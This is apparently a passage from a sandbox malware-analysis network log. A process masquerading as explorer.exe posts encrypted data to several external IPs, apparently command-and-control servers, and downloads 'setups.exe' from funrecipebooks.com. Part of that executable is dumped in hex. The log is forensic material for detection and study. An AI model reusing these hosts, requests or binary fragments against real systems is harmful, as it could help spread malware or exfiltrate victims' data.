62 49 43 56 50 54 36 42 43 2b 62 6c 74 2f 39 6e 6d 4a 46 67 62 71 70 4a 51 2f Data Ascii: CqES6D7TWk4aep8DNEhN+iX9WWlU9hBJy8rSNAuhxYZvfUJj96m6WyjPk8j0t2kktxPCHzOhC9wa5PKPCxrtKt6K13U2yYirzJNa2QI46zoUIptgy6udGw4gosrtfuIuiXQ1NIAUsN5V3bL3RJQ4ABUgMQMcStR5dCE0XWOP3TlUV+a180aptvtqE+cXqkggT3xgrVi1WotxqzE/UMKMSQEzK5s9P+I283r/TbICVPT6BC+blt/9nmJFgbqpJQ/
2024-07-27 05:30:21 UTC	16384	OUT	Data Raw: 57 4d 47 46 41 67 64 61 55 4e 57 52 68 50 66 75 79 59 32 7a 41 6f 76 72 46 2b 69 32 35 33 4b 49 38 59 48 2b 76 45 34 46 64 6b 53 54 53 34 39 73 53 56 42 45 45 67 5a 67 75 70 71 71 36 43 64 50 59 6b 6f 69 2f 6f 6f 4c 4f 2f 32 35 43 53 74 6a 4d 65 47 72 6d 56 49 61 61 6f 41 64 62 6b 79 58 6e 54 42 37 33 44 39 33 64 41 4e 61 51 4c 72 52 35 37 41 59 6f 51 4e 2b 50 79 36 36 65 61 51 66 58 75 38 49 34 72 45 6f 4d 76 4c 6a 76 4b 4b 6c 30 61 4a 6f 77 57 30 6e 71 55 45 74 62 42 73 71 4d 51 38 53 59 71 6e 78 78 38 31 48 4e 76 34 4b 75 6a 78 37 4b 54 46 64 61 59 4f 53 52 4b 38 73 6a 38 59 66 37 67 42 41 7a 69 7a 39 47 4d 67 78 4b 71 73 2b 46 52 61 70 4f 6c 6c 56 39 44 67 62 46 56 39 79 49 6e 58 65 4e 6b 74 2b 75 43 51 65 4e 67 62 39 36 32 2f 4c 41 30 72 6c 6a 2f 62 Data Ascii: WMGFAgdaUNWRhPfuyY2zAovrF+i253KI8YH+vE4FdkSTS49sSVBEEgZgupqq6CdPYkoi/ooLO/25CStjMeGrmVIaaoAdbkyXnTB73D93dANaQLrR57AYoQN+Py66eaQfXu8I4rEoMvLjvKKl0aJowW0nqUEtbBsqMQ8SYqnxx81HNv4Kujx7KTFdaYOSRK8sj8Yf7gBAziz9GMgxKqs+FRapOllV9DgbFV9yInXeNkt+uCQeNgb962/LA0rlj/b
2024-07-27 05:30:21 UTC	16384	OUT	Data Raw: 59 42 6a 38 66 62 54 6e 65 2b 41 38 38 76 72 4a 32 48 66 73 4e 45 6a 36 6c 66 79 56 64 61 7a 47 7a 6f 36 52 63 7a 52 32 52 73 46 52 69 75 4b 62 56 5a 4e 71 6e 31 62 47 56 39 61 6b 67 57 65 47 59 30 52 69 30 68 2b 32 56 32 70 73 77 61 67 79 6c 4c 42 76 69 59 66 6e 4c 7a 64 4c 79 4c 6e 56 42 32 37 37 6a 4b 4e 75 43 58 51 56 79 59 48 77 74 2b 56 6c 55 45 6c 4a 32 35 2f 51 43 41 59 66 7a 4f 41 78 68 35 6b 6a 68 51 36 4a 34 6b 6b 50 37 30 50 53 30 65 54 38 54 4d 76 32 44 78 32 78 32 39 6f 72 32 37 5a 67 7a 55 49 6b 55 67 51 70 36 6a 6b 36 34 63 34 56 36 4d 42 47 55 61 46 55 31 36 6b 74 6c 48 71 77 77 4a 76 61 49 59 75 64 4a 38 62 53 47 63 4a 51 66 73 65 45 75 37 47 4a 76 61 54 30 55 38 44 68 44 4b 54 49 32 38 37 64 66 64 6f 7a 39 4f 63 48 70 47 34 71 55 35 39 Data Ascii: YBj8fbTne+A88vrJ2HfsNEj6lfyVdazGzo6RczR2RsFRiuKbVZNqn1bGV9akgWeGY0Ri0h+2V2pswagylLBviYfnLzdLyLnVB277jKNuCXQVyYHwt+VlUElJ25/QCAYfzOAxh5kjhQ6J4kkP70PS0eT8TMv2Dx2x29or27ZgzUIkUgQp6jk64c4V6MBGUaFU16ktlHqwwJvaIYudJ8bSGcJQfseEu7GJvaT0U8DhDKTI287dfdoz9OcHpG4qU59
2024-07-27 05:30:21 UTC	16384	OUT	Data Raw: 7a 4d 67 67 7a 68 4a 38 56 58 6c 4f 6d 2b 52 74 34 36 70 4f 68 4b 6b 44 70 46 56 2f 79 49 71 55 53 2f 73 75 58 48 34 72 42 6a 69 37 4d 4d 36 6e 75 6e 55 42 55 6a 69 48 78 5a 76 34 39 70 37 42 6b 63 68 4e 35 61 4f 79 57 4d 33 6f 35 35 61 4b 69 42 2b 6a 6e 4c 71 32 62 75 4a 36 49 65 51 34 6d 53 73 49 50 2f 4f 51 31 54 6f 53 67 6c 6b 78 42 57 6c 4e 4f 71 67 58 78 6c 78 71 66 34 65 4d 68 64 41 31 30 5a 6c 57 51 69 72 53 35 38 75 4a 43 73 73 2b 62 61 5a 79 49 68 59 33 34 58 57 65 6a 62 75 43 75 4e 75 73 43 4a 49 52 6c 2b 50 5a 49 73 39 68 59 31 4e 71 33 76 6b 34 58 4b 39 31 79 42 32 70 36 45 6e 75 75 64 7a 58 71 4a 55 63 70 50 71 61 78 74 52 75 6f 4f 6c 44 34 53 57 31 67 6b 63 78 50 39 43 31 65 47 56 79 31 65 55 33 5a 49 56 50 39 56 39 52 64 52 43 30 42 64 52 Data Ascii: zMggzhJ8VXlOm+Rt46pOhKkDpFV/yIqUS/suXH4rBji7MM6nunUBUjiHxZv49p7BkchN5aOyWM3o55aKiB+jnLq2buJ6IeQ4mSsIP/OQ1ToSglkxBWlNOqgXxlxqf4eMhdA10ZlWQirS58uJCss+baZyIhY34XWejbuCuNusCJIRl+PZIs9hY1Nq3vk4XK91yB2p6EnuudzXqJUcpPqaxtRuoOlD4SW1gkcxP9C1eGVy1eU3ZIVP9V9RdRC0BdR
2024-07-27 05:30:21 UTC	16384	OUT	Data Raw: 62 5a 72 30 49 68 6b 64 32 32 5a 35 31 2b 62 36 50 77 51 46 49 64 74 34 76 69 6f 31 7a 71 54 6d 71 4f 7a 76 54 30 45 4f 47 44 31 76 77 49 7a 78 4f 31 70 79 74 74 39 36 5a 78 70 4d 64 4c 7a 71 54 74 33 32 49 6b 4c 78 59 75 35 5a 54 56 32 47 41 6e 75 6c 6f 76 5a 54 75 38 31 37 41 2f 75 55 52 67 32 67 4b 44 78 4b 54 65 59 49 42 32 55 47 57 74 65 32 65 74 35 38 7a 45 55 71 6f 78 4c 59 79 58 6d 6f 37 75 6d 45 51 71 41 4f 48 45 71 63 6e 49 59 77 52 5a 67 59 56 6a 43 36 6f 49 6a 2b 50 74 64 50 48 54 48 4f 46 30 32 6b 71 6e 30 6d 5a 33 65 38 44 6c 75 44 59 4f 54 75 61 6d 43 4e 34 78 54 42 31 62 44 4a 45 66 51 31 59 45 47 69 4e 6f 6a 46 31 39 41 65 2b 41 2b 48 4c 38 6a 6d 35 72 54 43 64 4a 75 31 41 36 38 4d 36 34 52 59 57 36 44 6a 42 43 58 2f 7a 45 62 2b 39 43 44 Data Ascii: bZr0Ihkd22Z51+b6PwQFIdt4vio1zqTmqOzvT0EOGD1vwIzxO1pytt96ZxpMdLzqTt32IkLxYu5ZTV2GAnulovZTu817A/uURg2gKDxKTeYIB2UGWte2et58zEUqoxLYyXmo7umEQqAOHEqcnIYwRZgYVjC6oIj+PtdPHTHOF02kqn0mZ3e8DluDYOTuamCN4xTB1bDJEfQ1YEGiNojF19Ae+A+HL8jm5rTCdJu1A68M64RYW6DjBCX/zEb+9CD
2024-07-27 05:30:21 UTC	16384	OUT	Data Raw: 61 71 55 57 36 4f 59 62 51 6a 5a 46 79 50 64 6a 45 37 61 79 4d 45 46 53 38 35 4e 4c 33 70 2f 69 58 47 67 63 33 53 57 31 54 6e 42 69 73 64 51 2b 37 57 31 64 46 6d 51 41 67 74 38 31 65 78 42 47 74 65 57 44 56 62 4c 64 32 33 65 38 62 76 36 49 4a 36 64 6e 4a 38 41 70 73 77 6f 66 5a 6d 58 58 79 74 52 2f 4f 42 34 57 35 32 32 45 70 76 54 54 38 39 66 67 77 51 43 73 53 45 66 44 6d 75 48 48 7a 37 4b 72 4e 68 6a 55 62 58 65 32 47 36 78 35 74 62 65 53 64 4a 64 42 48 4f 6e 56 37 74 30 75 32 46 4b 46 53 71 73 73 32 72 4d 46 70 31 6c 69 36 70 68 4c 46 46 53 5a 36 6b 4f 6c 47 55 31 63 4c 38 57 47 56 59 31 35 59 66 4d 71 58 32 36 52 4a 4a 5a 7a 35 73 43 44 64 46 6c 2f 63 6a 39 33 62 34 36 58 4d 56 70 47 6c 6b 33 6c 49 75 4d 75 4b 4d 45 68 57 70 74 61 65 45 41 4e 41 67 6f Data Ascii: aqUW6OYbQjZFyPdjE7ayMEFS85NL3p/iXGgc3SW1TnBisdQ+7W1dFmQAgt81exBGteWDVbLd23e8bv6IJ6dnJ8ApswofZmXXytR/OB4W522EpvTT89fgwQCsSEfDmuHHz7KrNhjUbXe2G6x5tbeSdJdBHOnV7t0u2FKFSqss2rMFp1li6phLFFSZ6kOlGU1cL8WGVY15YfMqX26RJJZz5sCDdFl/cj93b46XMVpGlk3lIuMuKMEhWptaeEANAgo
2024-07-27 05:30:21 UTC	8623	OUT	Data Raw: 5a 63 59 73 43 30 53 78 41 68 56 72 4d 48 55 6a 48 58 49 72 62 37 53 77 6b 5a 6e 42 41 62 31 42 50 54 39 45 44 42 72 4f 41 48 79 33 54 43 7a 75 46 52 51 2b 36 76 43 32 45 35 58 6e 66 6f 7a 65 71 69 68 51 7a 37 39 58 44 70 41 79 6b 4a 53 78 69 5a 6f 37 43 49 30 37 56 4d 55 53 52 73 53 74 71 32 53 44 67 75 75 57 5a 45 4a 5a 47 4f 43 4d 30 41 70 67 7a 6f 53 67 44 5a 58 38 52 4e 54 66 50 38 72 6e 79 6a 38 72 2f 31 67 44 47 70 59 4a 71 39 2f 52 57 62 62 72 6f 41 6a 55 47 76 70 42 76 62 6d 2f 52 77 70 6f 37 4d 79 53 53 75 32 41 74 30 46 34 31 4a 4e 30 55 4e 6e 51 4c 69 79 44 4d 4f 4b 76 56 55 6c 4c 41 34 56 55 4b 72 35 66 43 63 42 67 49 4b 49 49 4d 69 42 57 45 4e 4e 76 42 75 2b 48 61 58 64 64 30 64 4c 46 73 34 66 59 69 77 6d 4d 45 34 4a 75 52 52 5a 5a 6a 78 72 Data Ascii: ZcYsC0SxAhVrMHUjHXIrb7SwkZnBAb1BPT9EDBrOAHy3TCzuFRQ+6vC2E5XnfozeqihQz79XDpAykJSxiZo7CI07VMUSRsStq2SDguuWZEJZGOCM0ApgzoSgDZX8RNTfP8rnyj8r/1gDGpYJq9/RWbbroAjUGvpBvbm/Rwpo7MySSu2At0F41JN0UNnQLiyDMOKvVUlLA4VUKr5fCcBgIKIIMiBWENNvBu+HaXdd0dLFs4fYiwmME4JuRRZZjxr
2024-07-27 05:30:23 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:30:23 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	51815	107.173.160.139	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:30:23 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1143
2024-07-27 05:30:23 UTC	1143	OUT	Data Raw: 5a 73 5a 4a 30 73 51 63 6a 63 77 6c 50 33 77 76 67 44 46 31 59 41 72 33 6a 4d 39 6f 6a 53 52 6a 6d 37 49 4f 69 63 30 44 44 44 39 6e 7a 4e 31 39 47 6b 4d 5a 68 62 5a 41 31 2b 6a 46 6f 73 6d 6f 72 2f 45 52 72 65 52 38 6e 41 44 6e 76 32 44 39 42 4b 6a 77 42 77 44 6a 6e 41 30 61 4e 4e 57 6d 51 70 39 42 49 51 64 61 47 6a 54 6d 2b 6e 77 31 65 59 33 38 6f 65 6d 62 64 47 4d 37 68 43 68 51 33 63 55 65 44 50 62 68 41 6a 2b 2f 6a 45 44 74 5a 33 64 67 50 6e 63 64 42 49 42 36 42 72 4a 31 4c 30 66 73 59 32 4e 6f 72 4f 53 37 4d 47 63 4c 61 4b 6c 4e 6d 59 4e 49 73 51 4f 77 68 33 5a 74 56 35 50 33 64 38 49 4a 73 34 4e 68 44 31 37 42 78 69 48 54 6b 6d 33 6c 63 6f 30 75 31 67 38 41 58 64 70 6e 79 65 38 7a 72 76 78 48 35 48 67 42 53 61 4b 45 71 65 68 4b 44 73 43 54 79 74 31 Data Ascii: ZsZJ0sQcjcwlP3wvgDF1YAr3jM9ojSRjm7IOic0DDD9nzN19GkMZhbZA1+jFosmor/ERreR8nADnv2D9BKjwBwDjnA0aNNWmQp9BIQdaGjTm+nw1eY38oembdGM7hChQ3cUeDPbhAj+/jEDtZ3dgPncdBIB6BrJ1L0fsY2NorOS7MGcLaKlNmYNIsQOwh3ZtV5P3d8IJs4NhD17BxiHTkm3lco0u1g8AXdpnye8zrvxH5HgBSaKEqehKDsCTyt1
2024-07-27 05:30:25 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:30:25 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:30:25 UTC	685	IN	Data Raw: 6a 37 36 31 4f 4c 6b 39 75 6f 75 38 69 44 57 45 59 61 54 63 4b 6a 64 59 64 2f 44 4a 76 75 78 53 55 4f 35 31 76 65 76 51 6b 45 2b 76 4e 4c 48 67 70 7a 36 36 31 6b 51 41 37 62 4c 4b 2b 79 79 5a 69 6e 70 47 78 41 32 73 51 61 73 33 70 6a 54 68 64 52 69 36 31 6a 44 76 63 76 45 64 53 49 75 31 70 2f 42 73 59 33 6f 6a 51 30 77 6d 35 66 78 55 6e 66 39 4e 4e 2b 32 37 72 6f 52 78 34 75 77 46 66 48 31 43 55 67 74 36 70 4c 57 79 57 35 56 5a 46 76 32 6c 6d 38 63 32 72 35 73 4a 47 79 35 51 71 4a 4d 64 66 55 71 39 31 75 2b 39 54 30 68 34 7a 4d 70 2b 42 66 69 2b 74 59 53 54 4c 4f 43 44 77 77 2f 6d 49 73 75 65 30 48 4f 36 59 45 44 56 71 37 67 62 72 6d 76 2b 50 45 30 61 4b 74 34 38 45 36 4e 58 49 75 79 39 68 31 61 43 6c 61 4c 66 6d 58 33 76 35 44 64 54 6f 68 55 76 2b 70 32 Data Ascii: j761OLk9uou8iDWEYaTcKjdYd/DJvuxSUO51vevQkE+vNLHgpz661kQA7bLK+yyZinpGxA2sQas3pjThdRi61jDvcvEdSIu1p/BsY3ojQ0wm5fxUnf9NN+27roRx4uwFfH1CUgt6pLWyW5VZFv2lm8c2r5sJGy5QqJMdfUq91u+9T0h4zMp+Bfi+tYSTLOCDww/mIsue0HO6YEDVq7gbrmv+PE0aKt48E6NXIuy9h1aClaLfmX3v5DdTohUv+p2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	51817	167.235.128.153	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:30:26 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:30:26 UTC	1122	OUT	Data Raw: 42 54 4e 70 50 59 4f 30 2b 38 30 31 59 50 72 4d 4f 7a 76 63 49 51 62 77 32 59 36 54 4e 2f 49 62 42 57 31 7a 36 43 4a 30 6f 69 30 63 55 76 59 4d 51 46 6d 68 53 68 69 6e 31 4e 37 7a 74 58 76 31 31 72 58 5a 78 4c 6c 79 6b 52 49 72 74 6b 75 55 72 65 65 32 77 2f 64 31 2b 54 57 56 61 53 52 4c 69 38 69 54 6b 61 31 75 4a 67 52 38 4a 4c 6b 6a 77 4a 72 37 54 56 53 2f 52 7a 4e 74 32 56 38 52 38 49 47 4d 5a 79 7a 30 59 46 77 76 46 45 44 62 38 31 6a 6b 34 4c 37 4d 59 58 6e 74 70 76 47 38 32 42 58 4c 74 38 47 47 30 76 2b 44 4e 62 59 56 67 52 50 54 44 45 46 51 50 74 67 41 69 67 4c 6f 57 31 62 42 44 2f 43 61 52 50 2f 66 4f 55 31 6e 31 59 5a 41 50 55 64 7a 44 76 46 66 5a 38 35 70 50 36 33 4c 46 5a 6e 4a 58 66 65 38 47 56 4f 52 2b 71 51 6f 6f 6c 32 6f 73 56 52 70 52 30 6b Data Ascii: BTNpPYO0+801YPrMOzvcIQbw2Y6TN/IbBW1z6CJ0oi0cUvYMQFmhShin1N7ztXv11rXZxLlykRIrtkuUree2w/d1+TWVaSRLi8iTka1uJgR8JLkjwJr7TVS/RzNt2V8R8IGMZyz0YFwvFEDb81jk4L7MYXntpvG82BXLt8GG0v+DNbYVgRPTDEFQPtgAigLoW1bBD/CaRP/fOU1n1YZAPUdzDvFfZ85pP63LFZnJXfe8GVOR+qQool2osVRpR0k
2024-07-27 05:30:28 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:30:26 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:30:28 UTC	685	IN	Data Raw: 47 68 50 62 4b 54 77 79 49 72 6e 61 69 47 48 39 73 46 78 5a 6d 47 35 4f 4e 6f 53 6f 62 43 77 77 7a 6b 70 6c 53 47 41 67 4e 45 76 73 48 4e 5a 6c 4c 79 79 68 65 37 55 4e 33 37 54 34 79 67 74 36 64 2f 79 42 39 54 47 52 48 38 77 35 6b 72 69 53 77 6e 44 42 69 6d 6c 78 5a 38 64 34 4b 70 6e 4a 43 47 4d 35 5a 57 33 33 35 67 4c 68 61 56 7a 77 79 73 63 55 4b 48 6a 63 76 51 6c 6a 53 44 2f 4b 63 52 2b 4f 64 76 59 73 6d 47 42 73 6c 4f 72 45 73 70 44 47 79 49 79 70 51 48 54 64 33 76 39 45 31 43 61 72 65 65 57 58 51 70 6c 2f 75 33 32 39 38 62 6d 6a 78 56 37 57 4b 79 4e 5a 4b 45 70 69 48 51 36 72 36 55 4c 64 4e 38 57 42 6b 42 79 33 4d 30 32 75 72 61 34 7a 30 4e 35 48 36 57 64 7a 76 76 33 6a 54 50 37 66 54 36 32 6b 2b 54 58 34 38 58 32 6a 6a 79 5a 31 69 78 6a 33 78 4e 53 Data Ascii: GhPbKTwyIrnaiGH9sFxZmG5ONoSobCwwzkplSGAgNEvsHNZlLyyhe7UN37T4ygt6d/yB9TGRH8w5kriSwnDBimlxZ8d4KpnJCGM5ZW335gLhaVzwyscUKHjcvQljSD/KcR+OdvYsmGBslOrEspDGyIypQHTd3v9E1CareeWXQpl/u3298bmjxV7WKyNZKEpiHQ6r6ULdN8WBkBy3M02ura4z0N5H6Wdzvv3jTP7fT62k+TX48X2jjyZ1ixj3xNS

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	51820	107.173.160.137	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:30:28 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:30:28 UTC	1122	OUT	Data Raw: 4f 48 65 36 42 73 52 35 6a 48 4b 44 39 4a 54 5a 59 32 45 64 51 64 4e 43 46 31 47 57 4d 44 2b 77 47 74 75 53 31 58 66 2f 34 68 67 48 30 56 30 42 59 45 56 69 73 34 50 65 73 4e 4f 31 37 4b 71 35 71 45 64 48 66 67 4e 59 51 68 48 67 49 54 74 30 65 72 6b 56 58 45 5a 56 35 77 47 75 34 62 75 43 63 53 47 4a 58 68 5a 6a 77 52 30 31 53 32 71 44 2b 42 68 57 43 78 52 4b 33 64 4e 71 47 4c 52 30 43 38 5a 56 37 36 47 59 79 6f 4a 6e 4a 57 32 7a 47 73 6a 6f 75 67 73 55 67 57 51 37 42 6f 65 49 4d 6d 69 4f 6c 53 54 4e 74 46 61 61 79 4c 56 69 56 76 36 64 4b 63 6f 44 41 66 77 49 70 46 74 53 62 55 5a 53 53 52 4f 79 65 4c 33 46 34 70 65 66 4f 44 62 32 76 51 4d 35 55 6d 58 53 6f 64 47 4f 62 55 77 34 6d 58 36 7a 42 78 67 32 46 72 72 69 38 59 41 34 4e 50 2b 35 6e 75 2f 57 2f 41 38 Data Ascii: OHe6BsR5jHKD9JTZY2EdQdNCF1GWMD+wGtuS1Xf/4hgH0V0BYEVis4PesNO17Kq5qEdHfgNYQhHgITt0erkVXEZV5wGu4buCcSGJXhZjwR01S2qD+BhWCxRK3dNqGLR0C8ZV76GYyoJnJW2zGsjougsUgWQ7BoeIMmiOlSTNtFaayLViVv6dKcoDAfwIpFtSbUZSSROyeL3F4pefODb2vQM5UmXSodGObUw4mX6zBxg2Frri8YA4NP+5nu/W/A8
2024-07-27 05:30:30 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:30:30 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:30:30 UTC	685	IN	Data Raw: 64 44 41 59 4b 44 4f 71 53 34 59 77 4d 68 56 4c 52 47 34 44 78 45 6f 42 70 51 64 4c 6e 73 73 67 71 32 69 65 48 66 56 67 4f 39 59 2b 2b 53 6f 67 62 4b 50 30 4c 41 5a 46 55 78 6e 32 30 6d 48 6a 2b 2b 39 73 57 57 48 51 48 47 30 66 68 35 74 77 78 64 30 59 66 71 32 79 6c 30 48 63 6f 53 34 58 6a 4e 6e 39 6c 48 6e 39 47 65 68 46 46 77 6e 55 33 55 4e 33 52 59 78 2b 62 66 44 72 4c 74 77 58 30 31 56 45 39 54 56 70 36 6a 77 61 6e 56 66 75 62 32 4c 7a 31 61 52 49 2b 47 6f 42 6d 4b 2f 33 70 69 75 61 6c 71 56 48 6e 4b 79 72 35 51 53 51 4f 79 74 76 61 2f 57 67 66 6d 5a 6a 5a 52 33 57 34 38 57 62 64 63 43 48 6f 2b 32 66 2f 53 6e 45 38 50 6e 48 4c 35 74 4f 4e 4d 7a 53 68 79 4c 41 54 58 6d 71 4f 6d 6e 6e 30 2b 6e 4c 6f 61 73 77 48 57 78 77 37 74 55 64 71 55 78 65 54 48 68 Data Ascii: dDAYKDOqS4YwMhVLRG4DxEoBpQdLnssgq2ieHfVgO9Y++SogbKP0LAZFUxn20mHj++9sWWHQHG0fh5twxd0Yfq2yl0HcoS4XjNn9lHn9GehFFwnU3UN3RYx+bfDrLtwX01VE9TVp6jwanVfub2Lz1aRI+GoBmK/3piualqVHnKyr5QSQOytva/WgfmZjZR3W48WbdcCHo+2f/SnE8PnHL5tONMzShyLATXmqOmnn0+nLoaswHWxw7tUdqUxeTHh

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	51821	162.0.235.84	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:30:30 UTC	166	OUT	GET /setups.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: funrecipebooks.com
2024-07-27 05:30:30 UTC	289	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 content-type: application/x-msdownload last-modified: Wed, 24 Jul 2024 14:01:43 GMT accept-ranges: bytes content-length: 141944 date: Sat, 27 Jul 2024 05:30:30 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2024-07-27 05:30:30 UTC	16095	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 0a d1 c2 65 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 30 00 00 34 01 00 00 ce 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 40 01 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 02 00 00 02 00 00 10 b8 02 00 02 00 60 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEde"04 @ @`@@
2024-07-27 05:30:30 UTC	16384	IN	Data Raw: 00 0a dc 06 6f 0d 01 00 0a 07 2a 11 05 2a 00 00 00 41 1c 00 00 02 00 00 00 3e 00 00 00 66 01 00 00 a4 01 00 00 0a 00 00 00 00 00 00 00 13 30 03 00 72 00 00 00 29 00 00 11 15 0a 73 31 01 00 06 0b 07 7b c2 00 00 04 04 6f 25 01 00 0a 07 03 7d bf 00 00 04 16 0c 2b 34 05 08 6f 30 01 00 0a 6f 31 01 00 0a 0d 09 72 60 14 00 70 7e b6 00 00 0a 6f 7c 00 00 0a 0d 07 7b c5 00 00 04 6f 32 01 00 0a 09 6f 33 01 00 0a 26 08 17 58 0c 08 05 6f 34 01 00 0a 32 c3 07 6f b2 00 00 0a 26 07 7b c0 00 00 04 0a 07 6f 0d 01 00 0a 06 2a 00 00 1b 30 05 00 9a 00 00 00 2a 00 00 11 03 6f 33 00 00 0a 2d 07 72 6a 14 00 70 10 01 04 6f 33 00 00 0a 2d 07 72 b6 14 00 70 10 02 00 0e 04 6f 33 00 00 0a 2d 15 72 e4 14 00 70 03 04 05 72 b5 05 00 70 28 5f 00 00 06 0a 2b 10 0e 04 03 04 05 72 b5 05 00 Data Ascii: o*A>f0r)s1{o%}+4o0o1r`p~o\|{o2o3&Xo42o&{o0*o3-rjpo3-rpo3-rprp(_+r
2024-07-27 05:30:30 UTC	16384	IN	Data Raw: 0d 01 00 f6 13 64 0d 01 00 96 3a 64 0d 01 00 8d 24 64 0d 01 00 3a 13 64 0d 06 00 3f 27 14 04 06 00 7a 0a 8b 0d 01 00 13 39 5f 0d 06 00 7c 25 64 0d 01 00 38 22 8e 0d 06 00 b0 39 64 0d 06 00 b3 1b 64 0d 06 00 3f 27 14 04 06 00 36 0c d1 0c 01 00 13 39 5f 0d 06 00 4f 0f 64 0d 06 00 44 3e 86 0d 01 00 f2 04 6e 0d 06 00 96 0a 64 0d 06 00 3f 27 14 04 06 00 f8 25 c2 0c 01 00 13 39 5f 0d 06 00 4f 0f 64 0d 01 00 e8 00 64 0d 01 00 f2 04 6e 0d 06 00 da 31 69 0d 33 01 3b 02 93 0d 33 01 ec 01 93 0d 33 01 8e 02 98 0d 06 00 90 26 c5 0c 06 00 ea 18 14 04 06 00 2e 40 14 04 06 00 4c 12 14 04 06 00 e4 0b 9d 0d 06 00 9b 28 a1 0d 06 00 90 26 c5 0c 06 00 2e 40 14 04 06 00 76 3b a5 0d 06 00 4c 12 14 04 06 06 b1 07 c2 0c 56 80 19 19 a8 0d 56 80 e0 09 a8 0d 56 80 d8 09 a8 0d 36 00 Data Ascii: d:d$d:d?'z9_\|%d8"9dd?'69_OdD>nd?'%9_Oddn1i3;33&.@L(&.@v;LVVV6
2024-07-27 05:30:30 UTC	15260	IN	Data Raw: 63 65 49 64 00 6d 79 49 64 00 67 65 74 5f 48 69 73 74 6f 72 79 49 64 00 6d 5f 50 6f 73 68 54 68 72 65 61 64 00 45 78 69 74 54 68 72 65 61 64 00 67 65 74 5f 43 75 72 72 65 6e 74 54 68 72 65 61 64 00 61 64 64 5f 4c 6f 61 64 00 50 72 6f 6d 70 74 43 68 6f 69 63 65 44 6c 67 5f 4c 6f 61 64 00 50 72 6f 67 72 65 73 73 5f 4c 6f 61 64 00 50 72 6f 6d 70 74 5f 4c 6f 61 64 00 4f 6e 46 6f 72 6d 4c 6f 61 64 00 41 64 64 00 61 64 64 00 69 73 41 62 6f 75 74 4c 6f 61 64 65 64 00 6d 5f 62 49 73 50 61 63 6b 61 67 65 64 00 52 69 6a 6e 64 61 65 6c 4d 61 6e 61 67 65 64 00 61 64 64 5f 54 65 78 74 43 68 61 6e 67 65 64 00 6d 5f 54 65 78 74 5f 54 65 78 74 43 68 61 6e 67 65 64 00 61 64 64 5f 53 65 6c 65 63 74 65 64 49 6e 64 65 78 43 68 61 6e 67 65 64 00 49 73 44 65 62 75 67 67 65 72 Data Ascii: ceIdmyIdget_HistoryIdm_PoshThreadExitThreadget_CurrentThreadadd_LoadPromptChoiceDlg_LoadProgress_LoadPrompt_LoadOnFormLoadAddaddisAboutLoadedm_bIsPackagedRijndaelManagedadd_TextChangedm_Text_TextChangedadd_SelectedIndexChangedIsDebugger
